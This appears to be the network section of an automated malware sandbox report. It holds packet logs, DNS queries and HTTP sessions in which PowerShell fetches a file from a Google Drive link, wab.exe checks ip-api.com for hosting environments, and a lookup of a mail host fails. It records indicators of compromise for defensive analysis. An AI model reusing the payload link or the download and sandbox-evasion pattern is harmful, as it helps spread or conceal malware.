                                                        Apr 18, 2024 11:07:11.664680958 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.664726973 CEST49708443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:11.664732933 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.667131901 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.667165995 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.667185068 CEST49708443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:11.667191982 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.667222977 CEST49708443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:11.668765068 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.670420885 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.670481920 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:11.670514107 CEST49708443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:11.670522928 CEST44349708142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:57.672133923 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:57.672144890 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:57.893935919 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:57.894108057 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:57.897871017 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:57.897882938 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:57.898242950 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:57.898343086 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:57.898889065 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:57.944123030 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.596847057 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.597119093 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.603503942 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.603693008 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.618515015 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.618812084 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.625302076 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.626971960 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.626991987 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.628042936 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.700726986 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.700839043 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.700854063 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.700916052 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.704191923 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.704670906 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.704678059 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.704827070 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.711503983 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.711879015 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.711885929 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.712137938 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.718842983 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.718990088 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.718998909 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.719141006 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.726099968 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.726159096 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.726181984 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.726224899 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.733416080 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.733477116 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.733484983 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.733588934 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.740747929 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.740968943 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.740976095 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.741148949 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.748018026 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.748073101 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.748080015 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.748133898 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.754806995 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.754909039 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.754918098 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.755000114 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.761405945 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.761501074 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.761508942 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.761578083 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.768079042 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.768145084 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.768197060 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.768251896 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.774677038 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.774759054 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.778098106 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.778207064 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.778219938 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.778412104 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.784779072 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.784838915 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.784883022 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.784966946 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.804877996 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.804938078 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.804944992 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.806972027 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.807638884 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.808118105 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.808125019 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.808973074 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.813327074 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.813517094 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.813527107 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.813659906 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.818406105 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.818717003 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.818733931 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.818783045 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.823402882 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.823477983 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.823486090 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.823807955 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.828181028 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.828238964 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.828304052 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.828304052 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.828314066 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.829992056 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.832921982 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.833041906 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.833050013 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.836968899 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.837656021 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.838326931 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.838335037 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.838711023 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.842452049 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.842500925 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.842509985 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.842633009 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.847198963 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.849503994 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.849513054 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.849747896 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.851871967 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.852067947 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.854568005 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.854681969 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.854688883 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.854973078 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.859035969 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.859108925 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.859114885 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.860163927 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.863925934 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.863981962 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.863987923 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.864129066 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.868585110 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.868645906 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.868670940 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.868968964 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.873339891 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.874206066 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.874214888 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.876137018 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.878077030 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.878139019 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.878158092 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.880131960 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.882846117 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.883328915 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.883337021 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.883398056 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.887378931 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.887495995 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.887502909 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.887573957 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.891921997 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.892106056 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.892112970 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.892257929 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.897131920 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.897253036 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.897262096 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.897337914 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.900857925 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.900973082 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.900980949 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.901154995 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.905122042 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.906183958 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.906191111 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.906240940 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.909414053 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.909894943 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.911621094 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.912112951 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.912121058 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.912225008 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.915945053 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.916119099 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.916126966 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.916178942 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.920133114 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.921792984 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.921799898 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.922513008 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.922908068 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.923033953 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.923038960 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.923330069 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.925620079 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.928374052 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.928416967 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.930258036 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.930270910 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.930980921 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.932111979 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.932120085 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.933593988 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.936115980 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.936125040 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.936213970 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.937839031 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.937845945 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.938133001 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.938896894 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.941505909 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.941576958 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.941576958 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.941586018 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.943998098 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.944097042 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.944120884 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.944154024 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.944313049 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.946487904 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.946625948 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.947746038 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.949253082 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.949261904 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.949640036 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.950206041 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.950474977 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.950481892 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.950684071 CEST49714443192.168.2.9142.250.105.132
                                                        Apr 18, 2024 11:07:58.952678919 CEST44349714142.250.105.132192.168.2.9
                                                        Apr 18, 2024 11:07:58.953039885 CEST49714443192.168.2.9142.250.105.132
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 18, 2024 11:07:09.339632988 CEST | 62800 | 53 | 192.168.2.9 | 1.1.1.1
Apr 18, 2024 11:07:09.443852901 CEST | 53 | 62800 | 1.1.1.1 | 192.168.2.9
Apr 18, 2024 11:07:09.918910027 CEST | 55730 | 53 | 192.168.2.9 | 1.1.1.1
Apr 18, 2024 11:07:10.025685072 CEST | 53 | 55730 | 1.1.1.1 | 192.168.2.9
Apr 18, 2024 11:07:59.374245882 CEST | 51661 | 53 | 192.168.2.9 | 1.1.1.1
Apr 18, 2024 11:07:59.479171038 CEST | 53 | 51661 | 1.1.1.1 | 192.168.2.9
Apr 18, 2024 11:08:00.009569883 CEST | 52045 | 53 | 192.168.2.9 | 1.1.1.1
Apr 18, 2024 11:08:00.113759995 CEST | 53 | 52045 | 1.1.1.1 | 192.168.2.9
Apr 18, 2024 11:08:01.558650970 CEST | 52408 | 53 | 192.168.2.9 | 1.1.1.1
Apr 18, 2024 11:08:01.680903912 CEST | 53 | 52408 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 18, 2024 11:07:09.339632988 CEST | 192.168.2.9 | 1.1.1.1 | 0x8020 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.918910027 CEST | 192.168.2.9 | 1.1.1.1 | 0xf7bc | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:59.374245882 CEST | 192.168.2.9 | 1.1.1.1 | 0x8f3 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:08:00.009569883 CEST | 192.168.2.9 | 1.1.1.1 | 0xb576 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:08:01.558650970 CEST | 192.168.2.9 | 1.1.1.1 | 0xfd7 | Standard query (0) | mail.myhydropowered.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 18, 2024 11:06:52.784538984 CEST | 1.1.1.1 | 192.168.2.9 | 0x5cd2 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:06:52.784538984 CEST | 1.1.1.1 | 192.168.2.9 | 0x5cd2 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.443852901 CEST | 1.1.1.1 | 192.168.2.9 | 0x8020 | No error (0) | drive.google.com |  | 142.251.15.139 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.443852901 CEST | 1.1.1.1 | 192.168.2.9 | 0x8020 | No error (0) | drive.google.com |  | 142.251.15.101 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.443852901 CEST | 1.1.1.1 | 192.168.2.9 | 0x8020 | No error (0) | drive.google.com |  | 142.251.15.100 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.443852901 CEST | 1.1.1.1 | 192.168.2.9 | 0x8020 | No error (0) | drive.google.com |  | 142.251.15.113 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.443852901 CEST | 1.1.1.1 | 192.168.2.9 | 0x8020 | No error (0) | drive.google.com |  | 142.251.15.102 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.443852901 CEST | 1.1.1.1 | 192.168.2.9 | 0x8020 | No error (0) | drive.google.com |  | 142.251.15.138 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:10.025685072 CEST | 1.1.1.1 | 192.168.2.9 | 0xf7bc | No error (0) | drive.usercontent.google.com |  | 142.250.105.132 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:59.479171038 CEST | 1.1.1.1 | 192.168.2.9 | 0x8f3 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:59.479171038 CEST | 1.1.1.1 | 192.168.2.9 | 0x8f3 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:59.479171038 CEST | 1.1.1.1 | 192.168.2.9 | 0x8f3 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:08:00.113759995 CEST | 1.1.1.1 | 192.168.2.9 | 0xb576 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:08:01.680903912 CEST | 1.1.1.1 | 192.168.2.9 | 0xfd7 | Server failure (2) | mail.myhydropowered.com | none | none | A (IP address) | IN (0x0001) | false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
                                                        • api.ipify.org
                                                        • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49716 | 208.95.112.1 | 80 | 7228 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
Apr 18, 2024 11:08:00.230763912 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                        Host: ip-api.com
                                                        Connection: Keep-Alive
Apr 18, 2024 11:08:00.348381042 CEST | 174 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 18 Apr 2024 09:08:00 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 5
                                                        Access-Control-Allow-Origin: *
                                                        X-Ttl: 60
                                                        X-Rl: 44
                                                        Data Raw: 74 72 75 65 0a
                                                        Data Ascii: true


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 142.251.15.139 | 443 | 7660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 09:07:09 UTC | 215 | OUT | GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Connection: Keep-Alive
2024-04-18 09:07:09 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 18 Apr 2024 09:07:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-dMi7Cj338ntXt-79qXfcYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.9 | 49708 | 142.250.105.132 | 443 | 7660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-04-18 09:07:10 UTC | 233 | OUT | GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
